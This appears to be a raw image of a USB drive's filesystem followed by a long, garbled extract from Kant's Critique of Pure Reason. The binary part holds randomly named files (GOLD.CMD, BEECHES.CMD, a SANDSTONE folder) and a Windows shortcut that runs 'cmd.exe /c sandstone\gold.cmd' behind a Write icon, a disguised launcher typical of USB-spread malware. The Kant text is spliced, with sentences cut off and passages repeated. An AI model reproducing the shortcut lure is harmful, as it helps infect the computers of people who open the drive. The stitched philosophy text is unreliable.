                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          B  I n f o  rr m a t i o   n   S y s t e  rm   V o l u   m e SYSTEM~1    �s�U�U  �s�U     RR      LNK !�s�U�U  sr�U �  As a n d s  Xt o n e   ��  ����SANDST~1   2 !�s�U�U  sr�U                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     .           �s�U�U  �s�U     ..          �s�U�U  �s�U      Bt   ������ �������������  ����W P S e t  �t i n g s .   d a WPSETT~1DAT  �s�U�U  �s�U                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       �����7�                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    L        �      F�@      ���r���2���-
����r��� �                    5 P�O� �:i�� +00� /C:\                   V 1     �U Windows @ 	  ﾇOwH�UZ.   c                   ~�� W i n d o w s    Z 1     �UG! System32  B 	  ﾇOwH�UT.   F                   e�� S y s t e m 3 2    V 2  � FS�k  cmd.exe @ 	  �FS�k�U�U.   4�         �         i� c m d . e x e      J            -       I         �<��    C:\Windows\System32\cmd.exe   / c   s a n d s t o n e \ g o l d . c m d  c : \ W I n D O W s \ s Y S T E m 3 2 \ W r I T e . E x e     �%SystemRoot%\sYSTEm32\WrITe.Exe                                                                                                                                                                                                                                     % S y s t e m R o o t % \ s Y S T E m 3 2 \ W r I T e . E x e                                                                                                                                                                                                                                                                                                                                                                                                                                                                                �%   �        �wN��]N�D.��Q���   `     �X       desktop-7bba119 BX�<FmME��x(��R%��K�s��-�{	oBX�<FmME��x(��R%��K�s��-�{	o�   	  ��   1SPS�XF�L8C���&�m�m          .   S - 1 - 5 - 2 1 - 0 4 8 9 6 3 6 2 8 - 0 9 6 6 3 6 2 3 9 - 0 4 6 3 9 4 4 8 1 0 - 1 0 0 6       9   1SPS�mD��pH�H@.�=x�   h    H   "$��+��I�a�<r9�B                                                                                                                                                                                                                                                                                                                                                                       .           !�s�U�U  �s�U     ..          !�s�U�U  �s�U      Ae x t i r  �p a t e . t   x t EXTIRP~1TXT  !�s�U�U  sr�U �� Bx t   ���� �������������  ����c o n c o  �m i t a t e   . t CONCOM~1TXT  !�s�U�U  sr�Ua Ml BOOKED  TXT !�s�U�U  sr�U� q� GRAND   TXT !�s�U�U  sr�U%� KILKETH TMP !�s�U�U  sr�U� � BEECHES CMD "�s�U�U  sr�U�  GOLD    CMD "�s�U�U  sr�U��                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   , which allows of complete certainty, does not consider the question objectively, but in relation to the foundation of the knowledge upon which the question is based.
§ 5
SCEPTICAL REPRESENTATION OF THE COSMOLOGICAL QUESTIONS IN THE FOUR TRANSCENDENTAL IDEAS

We should of ourselves desist from the demand that our questions be answered dogmatically, if from the start we understood that whatever the dogmatic answer might turn out to be it would only increase our ignorance, and cast us from one inconceivability into another, from one obscurity into another still greater, and perhaps even into contradictions. If our question is directed simply to a yes or no, we are well advised to leave aside the supposed grounds of the answer, and first consider what we should gain according as the answer is in the affirmative or in the negative. Should we then find that in both cases the outcome is mere nonsense, there will be good reason for instituting a critical examination of our question, to determine whether the question does not itself rest on a groundless presupposition, in that it plays with an idea the falsity of which can be more easily detected through study of its application and consequences than in its own separate representation.

This is the great utility of the sceptical mode of dealing with the questions which pure reason puts to pure reason. By its means we can deliver ourselves, at but a small cost, from a great body of sterile dogmatism, and set in its place a sober critique, which as a true cathartic will effectively guard us against such groundless beliefs and the supposed polymathy to which they lead.

If therefore, in dealing with a cosmological idea, I were able to appreciate beforehand that whatever view may be taken of the unconditioned in the successive synthesis of appearances, it must either be too large or too small for any concept of the understanding, I should be in a position to understand that since the cosmological idea has no bearing save upon an object of experience which has to be in conformity with a possible concept of the understanding. For since the beginning still presupposes a time which precedes it, it is still not unconditioned; and the law of the empirical employment of the understanding therefore obliges us to look for a higher temporal condition; and the world [as limited in time] is therefore obviously too small for this law.

This is also true of the twofold answer to the question regarding the magnitude of the world in space. If it is infinite and unlimited, it is too large for any possible empirical concept. If it is finite and limited, we have a right to ask what determines these limits. Empty space is no self-subsistent correlate of things, and cannot be a condition at which we could stop; still less can it be an empirical condition, forming part of a possible experience in its absolute completeness. Since the objects are nothing but mere representations, only in such a possible experience are they given. To say that they exist prior to all my experience is only to assert that they are to be met with if, starting from perception, I advance to that part of experience to which they belong. The cause of the empirical conditions of this advance (that which determines what members I shall meet with, or how far I can meet with any such in my regress) is transcendental, and is therefore necessarily unknown to me. We are not, however, concerned with this transcendental cause, but only with the rule of the advance in the experience in which objects, that is to say, appearances, are given to me. Moreover, in outcome it is a matter of indifference whether I say that in the empirical advance in space I can meet with stars a hundred times farther removed than the outermost now perceptible to me, or whether I say that they are perhaps to be met with in cosmical space even though no human being has ever perceived or ever will perceive them. For even supposing they were given as things in themselves, without relation to possible experience, it still remains true that they are nothing to me, and therefore are not objects, save in so far as they are contained in the series of the empirical regress. Only in another sort of relation, when these appearances would be used for the cosmological idea of an absolute whole, and when, therefore, we are dealing with are appearances — as mere representations as things in themselves.

It would be unjust to ascribe to us that long-decried empirical idealism, which, while it admits the genuine reality of space, denies the existence of outer things themselves.] The realist, in the transcendental meaning of this term, treats these modifications of our sensibility as self-subsistent things, that is, treats mere representations as things in themselves.

It would be unjust to ascribe to us that long-decried empirical idealism, which, while it admits the genuine reality of space, denies the existence of the extended beings in it, or at least considers their existence doubtful, and so does not in this regard allow of any properly demonstrable distinction between truth and dreams. As to the appearances of inner sense in time, empirical idealism finds no difficulty in regarding them as real things; indeed it even asserts that this inner experience is the sufficient as well as the only proof of the actual existence of its object (in itself, with all this time-determination).

Our transcendental idealism, on the contrary, admits the reality of the objects of outer intuition, as intuited in space, and of all changes in time, as represented by inner sense. For since space is a form of that intuition which we entitle outer, and since without objects in space there would be no empirical representation whatsoever, we can and must regard the extended beings in it as real; and the same is true of time. But this space and this time, and with them all appearances, are not in themselves things; they are nothing but representations, and cannot exist outside our mind. Even the inner and sensible intuition of our mind (as object of consciousness) which is represented as being determined by the succession of different states in time, is not the self proper, as it exists in itself — that is, is not the transcendental subject — but only an appearance that has been given to the sensibility of this, to us unknown, being.

This inner appearance cannot be admitted to exist in any such manner in and by itself; for it is conditioned by time, and time cannot be a determination of a thing in itself. The empirical truth of appearances in space and time is, however, sufficiently secured; it is adequately distinguished from dreams, if both dreams and genuine appearances cohere truly and completely in one experience, in accordance with empirical laws.

The objects of experience, then, are never given in themselves, but only in experience, and have no existence outside it. That there may be inhabitants in the moon, although no one has ever perceived them, must certainly be admitted. This, however, only means that in the possible advance of experience we may encounter them. For everything is real which stands in connection with a perception in accordance with the laws of empirical advance. They are therefore real if they stand in an empirical connection with my actual consciousness, although they are not for that reason real in themselves, that is, outside this advance of experience.

Nothing is really given us save perception and the empirical advance from this to other possible perceptions. For the appearances, as mere representations, are in themselves real only in perception, which perception is in fact nothing but the reality of an empirical representation, that is, appearance. To call an appearance a real thing prior to our perceiving it, either means that in the advance of experience we may encounter them. For everything is real which stands in connection with a perception in accordance with the laws of nature, but only to think and to invent in the assurance that it cannot be refuted by the facts of nature, not being bound by the evidence which they yield, but presuming to pass them by or even to subordinate them to a higher authority, namely, that of pure reason.

The empiricist will never allow, therefore, that any epoch of nature is to be taken as the absolutely first, or that any limit of his insight into the extent of nature is to be regarded as the widest possible. Nor does he permit any transition from the objects of nature — which he can analyse through observation and mathematics, and synthetically determine in intuition (the extended) — to those which neither sense nor imagination can ever represent in concreto (the simple). Nor will he admit the legitimacy of assuming in nature itself any power that operates independently of the laws of nature (freedom), and so of encroaching upon the business of the understanding, which is that of investigating, according to necessary rules, the origin of appearances. And, lastly, he will not grant that a cause ought ever to be sought outside nature, in an original being. We know nothing but nature, since it alone can present objects to us and instruct us in regard to their laws.

If the empirical philosopher had no other purpose in propounding his antithesis than to subdue the rashness and presumption of those who so far misconstrue the true vocation of reason as to boast of insight and knowledge just where true insight and knowledge cease, and to represent as furthering speculative interests that which is valid only in relation to practical interests (in order, as may suit their convenience, to break the thread of physical enquiries, and then under the pretence of extending knowledge to fasten it to transcendental ideas, through which we really know only that we know nothing); if, I say, the empiricist were satisfied with this, his principle would be a maxim urging moderation in our pretensions, modesty in our assertions, and yet at the same time the greatest possible extension of our understanding, through the teacher fittingly assigned to us, namely, through experience. If such were our procedure, we should not be cut off from employing intellectual presuppositions and faith on behalf of our practical interest; only they could never be permitted to assume the title and dignity of science and rational insight. Knowledge, which as such is speculative, can have no other object than that supplied by experience; if we transcend the limits thus imposed, the synthesis which seeks, independently of experience, new species of knowledge, lacks that substratum of intuition upon which alone it can be exercised.

But when empiricism itself, as frequently happens, becomes dogmatic in its attitude towards ideas, and confidently denies whatever lies beyond the sphere of its intuitive knowledge, it betrays the same lack of modesty; and this is all the more reprehensible owing to the irreparable injury which is thereby caused to the practical interests of reason.

The contrast between the teaching of Epicurus and that of Plato is of this nature.

Each of the two types of philosophy says more than it knows. The former encourages and furthers knowledge, though to the prejudice of the practical; the latter supplies excellent practical principles, but it permits reason to indulge in ideal explanations of natural appearances, in regard to which a speculative knowledge is alone possible to us — to the neglect of physical investigation.

Finally, as regards the third factor which has to be considered in a preliminary choice between the two conflicting parties, it is extremely surprising that empiricism should be so universally unpopular. The common understanding, it might be supposed, would eagerly adopt a programme which promises to satisfy it through exclusively empirical knowledge and the rational connections there revealed — in preference to the transcendental doctrine of the soul are answerable in this latter manner, and have indeed been so answered; its questions refer to the transcendental subject of all inner appearances, which is not itself appearance and consequently not given as object, and in which none of the categories (and it is to them that the question is really directed) meet with the conditions required for their application. We have here a case where the common saying holds, that no answer is itself an answer. A question as to the constitution of that something which cannot be thought through any determinate predicate — inasmuch as it is completely outside the sphere of those objects which can be given to us — is entirely null and void.]

The cosmological ideas alone have the peculiarity that they can presuppose their object, and the empirical synthesis required for its concept, as being given. The question which arises out of these ideas refers only to the advance in this synthesis, that is, whether it should be carried so far as to contain absolute totality — such totality, since it cannot be given in any experience, being no longer empirical. Since we are here dealing solely with a thing as object of a possible experience, not as a thing in itself, the answer to the transcendent cosmological question cannot lie anywhere save in the idea. We are not asking what is the constitution of any object in itself, nor as regards possible experience are we enquiring what can be given in concreto in any experience. Our sole question is as to what lies in the idea, to which the empirical synthesis can do no more than merely approximate; the question must therefore be capable of being solved entirely from the idea.

Since the idea is a mere creature of reason, reason cannot disclaim its responsibility and saddle it upon the unknown object.

It is not so extraordinary as at first seems the case, that a science should be in a position to demand and expect none but assured answers to all the questions within its domain (quaestiones domesticae), although up to the present they have perhaps not been found. In addition to transcendental philosophy, there are two pure rational sciences, one purely speculative, the other with a practical content, namely, pure mathematics and pure ethics. Has it ever been suggested that, because of our necessary ignorance of the conditions, is enjoined or set as a task, and that in this regress there can be no lack of given conditions.

These considerations make it clear that the major premise of the cosmological inference takes the conditioned in the transcendental sense of a pure category, while the minor premise takes it in the empirical sense of a concept of the understanding, it must be entirely empty and without meaning; for its object, view it as we may, cannot be made to agree with it. This is in fact the case with all cosmical concepts; and this is why reason, so long as it holds to them, is involved in an unavoidable antinomy. For suppose: —

First, that the world has no beginning: it is then too large for our concept, which, consisting as it does in a successive regress, can never reach the whole eternity that has elapsed. Or suppose that the world has a beginning, it will then, in the necessary empirical regress, be too small for the concept of the body, was not removed by the opposed judgment, but remained attached to it, the two judgments were not related as contradictory opposites.

If, therefore, we say that the world is a thing in itself, the answer to the transcendent cosmological question cannot lie anywhere save in the idea. We are not asking what is the constitution of any object in itself, nor as regards possible experience are we enquiring what can be given in concreto in any experience. Our sole question is as to what lies in the idea, to which the empirical synthesis.

The proud pretensions of reason, when it strives to extend its domain beyond all limits of experience, we have represented only in dry formulas that contain merely the ground of their legal claims. As befits a transcendental philosophy, they have been divested of all empirical features, although only in connection therewith can their full splendour be displayed. But in this empirical application, and in the progressive extension of the employment of reason, philosophy, beginning with the field of our experiences and steadily soaring to these lofty ideas, displays a dignity and worth such that, could it but make good its pretensions, it would leave all other human science far behind. For it promises a secure foundation for our highest expectations in respect of those ultimate ends towards which all the endeavours of reason must ultimately converge.

